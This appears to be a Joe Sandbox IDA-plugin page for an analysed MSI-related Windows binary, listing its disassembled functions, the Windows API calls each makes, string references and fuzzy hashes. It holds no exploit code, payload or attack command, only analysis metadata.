Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction ID: a8155d277b42324ef0505780f296d3caf95afc2396f018826750e40a756aa8aa
Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
Instruction Fuzzy Hash: FBB14972D056659FDB25CF68D881BFEBBA5EF59310F15816AE804AB341D23CDE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007133A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007133B4
IsDebuggerPresent.KERNEL32 ref: 00713480
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007134A0
UnhandledExceptionFilter.KERNEL32(?), ref: 007134AA

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 80046ed9ad3fab6a3b3f9a94f0848686976537d12c5a37a68eb4da3f85ce2278
Instruction ID: f0fd6cf185ee00d011d9ae49b4811e312309d9e6b4615c81cc405b59d271ac8e
Opcode Fuzzy Hash: 80046ed9ad3fab6a3b3f9a94f0848686976537d12c5a37a68eb4da3f85ce2278
Instruction Fuzzy Hash: 0A3129B5D0521CDBDB20DF64D9897CCBBB8AF08304F10409AE50CAB290EB759B85DF44

Uniqueness

Uniqueness Score: -1.00%

Function 006FD0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006FC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,DBD9785B,?,00733D30,000000FF), ref: 006FC657
Part of subcall function 006FC630: GetLastError.KERNEL32(?,00000000,00000000,DBD9785B,?,00733D30,000000FF), ref: 006FC661

IsDebuggerPresent.KERNEL32(?,?,00748AF0), ref: 006FD0D8
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00748AF0), ref: 006FD0E7

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006FD0E2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: f5497d8ba7bf9e875228251ede11c90f6eadf41d895f4bd9fecac19b98a1f0ce
Instruction ID: 3c2c917adcd6da972c3c987ee50c07c2d477acbb49e32c03b5b547ea929e3b30
Opcode Fuzzy Hash: f5497d8ba7bf9e875228251ede11c90f6eadf41d895f4bd9fecac19b98a1f0ce
Instruction Fuzzy Hash: 88E06DB02087458FE3749F28D8447527BE2AB11310F00885DE996C3251DBB8E448CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0072E237 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0072E28B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0072E2D5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0072E39B

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 02984d3699798a8552ff379ca9781350ec7d1785afd93e2e326ecc740914aae4
Instruction ID: 5fe1439c30468e90deb608f928f5aa8a1a3d0fc6a08e334bea4f2384abff6246
Opcode Fuzzy Hash: 02984d3699798a8552ff379ca9781350ec7d1785afd93e2e326ecc740914aae4
Instruction Fuzzy Hash: 4E618171500227DBEB28EF28EC86BBA77A8EF04301F104179E905C7186E77CD985DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00716E1B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00716F13
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00716F1D
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 00716F2A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 41df888e60afadd3ea87a3cb31beae420d28d3ff0e2e8dd3543a0817c657863a
Instruction ID: 3495983a01a7e376ada571ccd61931a2aa5e3e1a35d76268c953cfbc736d16ef
Opcode Fuzzy Hash: 41df888e60afadd3ea87a3cb31beae420d28d3ff0e2e8dd3543a0817c657863a
Instruction Fuzzy Hash: 8531B3B590121C9BCB21DF68D989BDDBBB8BF48710F5041EAE41CA6290E7749F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 006F45B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,DBD9785B,00000001,00000000,?,00000000,00734460,000000FF,?,006F474D,006F3778,?,00000000,00000000,?), ref: 006F45DB
LockResource.KERNEL32(00000000,?,00000000,00734460,000000FF,?,006F474D,006F3778,?,00000000,00000000,?,?,?,?,006F3778), ref: 006F45E6
SizeofResource.KERNEL32(00000000,00000000,?,00000000,00734460,000000FF,?,006F474D,006F3778,?,00000000,00000000,?,?,?), ref: 006F45F4

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 892a32e4e6fa2797a2ee69bb470a88c6d8c29c5e4f31827bf1f62c37d331c31c
Instruction ID: e6ce415fd619be477ac24e807601fcc9b1fb3b5190cb73d2073601fc5e60684a
Opcode Fuzzy Hash: 892a32e4e6fa2797a2ee69bb470a88c6d8c29c5e4f31827bf1f62c37d331c31c
Instruction Fuzzy Hash: 43110672A046589BD7398F59DC45BB7B7FCE786B25F00452AED1AC3740EB39AC00C694

Uniqueness

Uniqueness Score: -1.00%

Function 0072E111 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

EnumSystemLocalesW.KERNEL32(0072E237,00000001,00000000,?,-00000050,?,0072E868,00000000,?,?,?,00000055,?), ref: 0072E183

Strings

hr, xrefs: 0072E158

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: hr
API String ID: 2417226690-3223249719
Opcode ID: 73698fc17f577e21973fd417691b3c214004baa925f915013e8d29f2cec592c8
Instruction ID: 067230fdb8173d1df0200896387486083c21f65057044d392e744c4a0aae70f8
Opcode Fuzzy Hash: 73698fc17f577e21973fd417691b3c214004baa925f915013e8d29f2cec592c8
Instruction Fuzzy Hash: BB11293B2007159FDB189F38D8A15BAB791FF84729B15443CE54747B40E3757942CB40

Uniqueness

Uniqueness Score: -1.00%

Function 007276AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00724E3F,?,20001004,00000000,00000002,?,?,00724441), ref: 007276E3

Strings

2q, xrefs: 007276CE

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InfoLocale
String ID: 2q
API String ID: 2299586839-950290719
Opcode ID: a4b4a11a9efdd31a6221f4ccd18ad4baab3a8a71c7f6701cd89a308a24fe940d
Instruction ID: f3e85a4c5b22f5ff82057f335a061f2f9a8c107dbb89f4d855960447fb6da12f
Opcode Fuzzy Hash: a4b4a11a9efdd31a6221f4ccd18ad4baab3a8a71c7f6701cd89a308a24fe940d
Instruction Fuzzy Hash: A1E04F3250863CFBCF2A2F61ED09EAE3E2AFF44751F004010FC0565120CB3A8920EAD9

Uniqueness

Uniqueness Score: -1.00%

Function 0071E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction ID: 1905285f7e7c2a569dcab0c77b122ddb70e60824bdd6901d1841b515ab6663eb
Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
Instruction Fuzzy Hash: AFF11D71E002199FDF14CFACC9846EDB7B2FF98324F158269E815A7381D735AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0071A587 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

Tt, xrefs: 0071A589
0, xrefs: 0071A715

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID: 0$Tt
API String ID: 0-43938808
Opcode ID: b8254a0328ce6a0fced82a06ec9fd5834836f0f09e77127d842677eaf91eeed6
Instruction ID: 0e7eb1b4ef74bd4290517f1b1229f12d111b9a8400a7a0bf4a90fddafe220a0a
Opcode Fuzzy Hash: b8254a0328ce6a0fced82a06ec9fd5834836f0f09e77127d842677eaf91eeed6
Instruction Fuzzy Hash: 7BC1BD70902646AFCB29CF2CC494AFEB7B2BF55310F284619D496972D1C738ADC6CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00727B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00727F64,00000000,00000000,00000000), ref: 00727E23

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 67b12ed30cc9d4242c99b678e2d6e1cdab55aad2eb19256395741d7f79fe1a90
Instruction ID: 98edebb83833a6e539707b34f4e6341ee587445a9b8d6b4219619e572a9b2841
Opcode Fuzzy Hash: 67b12ed30cc9d4242c99b678e2d6e1cdab55aad2eb19256395741d7f79fe1a90
Instruction Fuzzy Hash: 24C13AB1E04235DBDB18AF68EE06ABEB778EF05720F544056F940EB291E7389E41C794

Uniqueness

Uniqueness Score: -1.00%

Function 007284BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007284B8,?,?,00000008,?,?,007314E4,00000000), ref: 007286EA

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: cbd61c7e69c6ffd73f3211a1bc27f64f0c9d647c068c17f164174258e6467497
Instruction ID: d7176ad53b8174887c30401a3afdc8108239ba3e660e4d4bb2cba7ac554a4fef
Opcode Fuzzy Hash: cbd61c7e69c6ffd73f3211a1bc27f64f0c9d647c068c17f164174258e6467497
Instruction Fuzzy Hash: D5B17E31211618CFD754CF28D48AB647BE0FF45365F258658E89ACF3A2CB3AE991CB41

Uniqueness

Uniqueness Score: -1.00%

Function 007135A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007135BF

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1926ee70b52e7f84a7ae3dec167bfa5cfbdf514439ab16162f3ac4e54b12c7b8
Instruction ID: 0e8dd054638a2ef5845c774af8be6d66005af2ebb092869f68e06ede72614787
Opcode Fuzzy Hash: 1926ee70b52e7f84a7ae3dec167bfa5cfbdf514439ab16162f3ac4e54b12c7b8
Instruction Fuzzy Hash: D15188B5A01205CBEB25CF58E8857AABBF0FB48354F14806BD405EB3A0D3789E80CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0072AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01dbc3c30345907e64a69e93a44cdef014d7bf709d379d4a3bf12da068d4f043
Instruction ID: 2d7c945674744bf4702f9df10d65db783eeff829f14420edef8dbe6219155aae
Opcode Fuzzy Hash: 01dbc3c30345907e64a69e93a44cdef014d7bf709d379d4a3bf12da068d4f043
Instruction Fuzzy Hash: A431F57290022DAFCB20DFB8DC89DBBB77DEB84310F144159F81597240EA38EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 0072E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0072E4DE

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: bb3f3790c2c1d5bb42d7bc6ea1053b86781fae6723092e84bdb2aa49a7c39d06
Instruction ID: d961d9be263f67de1aa26c8e1b9f0e72592a17815603c506e0bf147cdb95810b
Opcode Fuzzy Hash: bb3f3790c2c1d5bb42d7bc6ea1053b86781fae6723092e84bdb2aa49a7c39d06
Instruction Fuzzy Hash: B821C572654226EBDB289F2AEC45ABA73ACEF44314B14407AF901D6181FB38ED50C750

Uniqueness

Uniqueness Score: -1.00%

Function 0072E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0072E453,00000000,00000000,?), ref: 0072E6E5

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5aeaabe5bfe7b7b50e189ce1777a0aa412531d3749576971352391dc026f4e58
Instruction ID: 3c30a514850b4657f9ccef8a198abe6816d7c02c6da82811f26086f04dad7708
Opcode Fuzzy Hash: 5aeaabe5bfe7b7b50e189ce1777a0aa412531d3749576971352391dc026f4e58
Instruction Fuzzy Hash: 66F0CD36600236FBDB285764DC0ABFE7768FB40754F154424EC16A3280EA78FD41D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0072E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

EnumSystemLocalesW.KERNEL32(0072E48A,00000001,?,?,-00000050,?,0072E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0072E1F6

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 49f4a43b91ed69f642e9fc934db8e19446263c3f00fcfd48778b6b0c98652110
Instruction ID: b5cfd4deb25f0fbdea48c65ff87bf98e32de8661ccb2a493a8080c13d038e871
Opcode Fuzzy Hash: 49f4a43b91ed69f642e9fc934db8e19446263c3f00fcfd48778b6b0c98652110
Instruction Fuzzy Hash: 9CF0F6362007189FDB246F35EC85A7A7B95FF80768F05842DF9068B690D6B99C42DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00727132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00721C9A: EnterCriticalSection.KERNEL32(-0074DE50,?,00723576,?,0074A078,0000000C,00723841,?), ref: 00721CA9

EnumSystemLocalesW.KERNEL32(00727125,00000001,0074A1D8,0000000C,00727554,00000000), ref: 0072716A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a4834e2861c4e4f546ef11dc68703eb6aab2f2deb2a8b79592c2fa41fd6dc220
Instruction ID: e377386f4817e3e52b9911af7dc762e7fd2790e77d5b32cef1f4d0709ea75982
Opcode Fuzzy Hash: a4834e2861c4e4f546ef11dc68703eb6aab2f2deb2a8b79592c2fa41fd6dc220
Instruction Fuzzy Hash: 9EF087B6A40214EFE704DFA8E84AB9877F0FB89325F00811AF410DB2A0EB798900CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0072E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007257CC: GetLastError.KERNEL32(?,00000008,0072AD4C,?,?,?,?,00000000,?,?), ref: 007257D0
Part of subcall function 007257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00725872

EnumSystemLocalesW.KERNEL32(0072E01F,00000001,?,?,?,0072E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0072E0FD

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7c8bc753d11b6d018a64f25a8b1e77f9c801fd01c984bc2db137dd904da44609
Instruction ID: 8ad5dcf6ceb8540c34e220be2f9f0507ca86379c7da16c2b4faece5ba0104d20
Opcode Fuzzy Hash: 7c8bc753d11b6d018a64f25a8b1e77f9c801fd01c984bc2db137dd904da44609
Instruction Fuzzy Hash: 12F0AB3A30031997CB14AF35EC4966A7F94EFC1720F164068EE058F250C2BAD883C790

Uniqueness

Uniqueness Score: -1.00%

Function 007123F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

